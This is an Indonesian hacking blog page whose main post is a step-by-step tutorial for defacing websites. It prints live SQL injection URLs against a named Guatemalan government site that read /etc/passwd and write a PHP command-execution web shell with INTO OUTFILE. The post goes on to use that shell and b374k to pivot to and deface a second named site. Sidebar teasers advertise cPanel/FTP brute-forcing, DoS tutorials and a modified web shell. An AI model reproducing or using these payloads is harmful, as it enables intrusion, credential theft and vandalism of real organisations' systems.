[close]
..::Personal Site::..
Bruteforce dengan shell
sebetulnya teknik ini sama dengan postingan itu sama2 jumping buat ngebrote user dan password cpanel, ftp, ataupun whm oke langsung aja yah : (more…)
Tutorial Dos Attack untuk menjurus ke DDOS
kali ini ane mau buat tutor dos yah tau kan dos kalo belom tau bisa berkunjung ke http://id.wikipedia.org/wiki/Serangan_DoS oke langsung aja yah :D : (more…)
Tutorial buat para jumper
inget pilem jumper yg suka lompat kalo ini teknik sama suka lompat ke user lain satu server oke mulai aja yah tutornya :D (more…)
Ngedit Script b374k
nih scriptnya copas ke notepad terus save dengan file tipe php :D (*yg udah tau pasti ) http://xjamesx.tk/404.txt ngedit b374k biar 4 in 1, ga perlu banyak3 upload cukup 1 file sudah mematikan, fitur yg ditambahkan = bruteforce, readable, DOS, dan pengunaan password untuk mengakses shell tersebut :D (more…)
Steganografi Audio
—Steganografi adalah seni dan ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia. —Teknik steganografi meliputi banyak sekali metode komunikasi untuk menyembunyikan pesan rahasia (teks, audio atau gambar) di dalam berkas-berkas lain yang meng...
POC buat ngedeface++
Wah dah lama ga ngeblog kali ini gw mau share beberapa teknik2(POC) buat ngedeface . kalo yang sudah pada tau teknik2 ini jangan pada ngina yah maklum nubie mau coba bikin artikel :p yang sudah baca yah jangan lupa komen2nya yah itung2 belajar bareng :) ok mulai aja deh ke tutor (more…)
Mencegah serangan Syn & Ping Flood Attack (DOS)
1. Mencegah paket Syn Flood Attack (more…)
SQL Injection Flaw Patching
dan diambil dari http://www.indonesianhacker.org/showthread.php?t=529 yang diposting oleh v4mp Jangan cuma bisa attack. Tapi juga harus bisa defend.  Langsung aja.. Ini patch untuk mencegah serangan SQL Injection di halaman dinamis pada PHP + MySQL. (more…)
Web Security Yin-Yang (Attacking & Defending)
WEB SECURITY YIN-YANG Ditulis oleh: gentoo, foobar4joo@gmail.com "If you know both yourself and your enemy, you can win a hundred battles without a single loss." Di berbagai segi kehidupan, sangatlah di butuhkan keseimbangan. Bahkan yang sangat terkenal adalah sebuah ungkapan dari Sun Tzu yang saya tuliskan diatas, mengenali kelemahan musuh adalah penting, tetapi lebih penting lagi mengenali ...
Manifesto Seorang Hacker
Ini adalah dunia kami sekarang, dunianya electron dan switch, keindahan sebuah baut. Kami mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami criminal. (more…)

POC buat ngedeface++

Wah dah lama ga ngeblog

kali ini gw mau share beberapa teknik2(POC) buat ngedeface .

kalo yang sudah pada tau teknik2 ini jangan pada ngina

yah maklum nubie mau coba bikin artikel :p

yang sudah baca yah jangan lupa komen2nya

yah itung2 belajar bareng :)

ok mulai aja deh ke tutor

hal yg diperlukan :

  1. berdoa
  2. siapin makanan ringan
  3. dan segelas kopi (java)
  4. koneksi internet + komputernya :)

nah kalo udah pada siap liangsung pergi ke om google untuk melakukan pencarian dengan dork :

kemudian pilih deh web target yang memiliki vulnerability :)

target : http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7’+union+select+1,2,0x3C6120687265663D22687474703A2F2F6A616D6573306261737465722E7765622E6964223E6A616D6573306261737465723C2F613E,4,5,6,load_file(‘/etc/passwd’;),8,9,10/*

setelah masuk ke website targget ubah url nya yg tadinya load_file(‘/etc/passwd’;) menjadi

“<?php echo \'<pre>\’;system($_GET[\’cmd\’]);echo \'</pre>\’;?>”

dan diakhir url ditambahkan

+INTO+OUTFILE+”lokasi direktory(folder) yang permisionya 777/namashell.php”/*

real target : http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7’+union+select+1,2,3,4,5,6,”<?php echo \'<pre>\’;system($_GET[\’cmd\’]);echo \'</pre>\’;?>”,8,9,10+INTO+OUTFILE+”/home/inacif/www/design/default/james0bastershell.php”/*


setelah berhasil membuat shell dari sql injection sebaiknya di coba terlebih dahulu apakah berhasil

atau tidak dengan menjalankan perintah ls -al pada cmd=

real target : http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls -al

upload deh shell yg lebih familiar buat anda digunakan seperti saya b374k.php :D dengan perintah

download sebagai berikut :

dan hasilnya sebagai berikut :

bisa backconnect sama bind, lumayan buat DDOS atau apalah soalnya servernya ga make firewall.

kalo belom bisa ngeroot bisa pake teknik jumping karena di dalemnya ada 21 readable user directory

berikut hasil URL jumpingan dari http://www.inacif.gob.gt/ ke  http://www.cinde.com.gt/

URL : http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/

dan berikut hasil defaceannya :D

dan masih banyak lagi :p

sehubung banyak yg minta script scaner buat tuh web lewat YM oke ane berikan nih

http://www.inacif.gob.gt/design/default/james0basterscaner.php

NB : JANGAN RUSAK WEBNYA KALO MAU DIFACE JANGAN INDEXNYA, DEFACE HIDEN AJA.

ITU BUAT BELAJAR BARENG2 JANGAN SERAKAH

18 Responses

You can follow any responses to this entry through the RSS 2.0 feed.

You can leave a response, or trackback from your own site.

  1. ciresoft49 says:

    Mantap bang… thanks ea.. :)

  2. us4 says:

    pusing gan :hammer: ctrl+d dulu aja deh gan :confused:

  3. Mirolet says:

    Kk, maw nanya nih, itu mengenai directory yg ada permisi 777, gmn carinya ya? mohon penjelasannya. Thx

  4. k0d0k ng0r3k says:

    waduh,, pusing bacanya…
    ga ngerti sm skli…
    bs di ajarin lg ga kk?

  5. A121 says:

    gan progy2 yg perlu kita siapkan apa aja neh……
    coz pengen praktekin neh….

  6. komentator says:

    jadi kl diwebnya ga ada folder yg 777 ga bisa donk kk…

  7. ngbet says:

    mantap……lgsung coba…mhon ijnnya….

  8. naomychan says:

    ijin ngintip bro…

  9. sogel says:

    wih ini mantap bgt tutor’a… tpi syng ga ngrti2.. 😀 nyoba prhatiin ahh..

  10. Joker says:

    sip :* muah2 :*

  11. ikonspirasi says:

    manteb emang om james ini :D

Leave a Reply

[+] kaskus emoticons nartzco

..::james0baster::..

..::james0baster::.. (15)
Berita dan Pengumuman (11)
Hacking (11)
Hacking (8)
ICT (4)
Internet (6)
Jaringan Komputer (7)
Java (1)
Keamanan (5)
Keamanan & Perbaikan WEB (9)
Komputer (8)
Local (3)
Pemerograman (8)
PHP (6)
Tips and Trick (6)

WP Cumulus Flash tag cloud by Roy Tanck and Luke Morton requires Flash Player 9 or better.



James Baster Tamba | Buat Lencana Anda


Update status via Facebook for BlackBerry® smartphones

Update status via james0baster




Foto

Put To Your Site



..::james0baster::..


Find me at

CODER - Indonesian IT Community



james0baster on Facebook Jasakom Community - Powered by vBulletin



james0baster on Twitter Logo



Logo

Iklan



Lokasi Pengunjung

free counters

ID Pengunjung

IP

Sponsor

Web Hosting

Logo Pandi

Iklan

Copyright - All Rights Reserved / Developed By james0baster
Get Adobe Flash player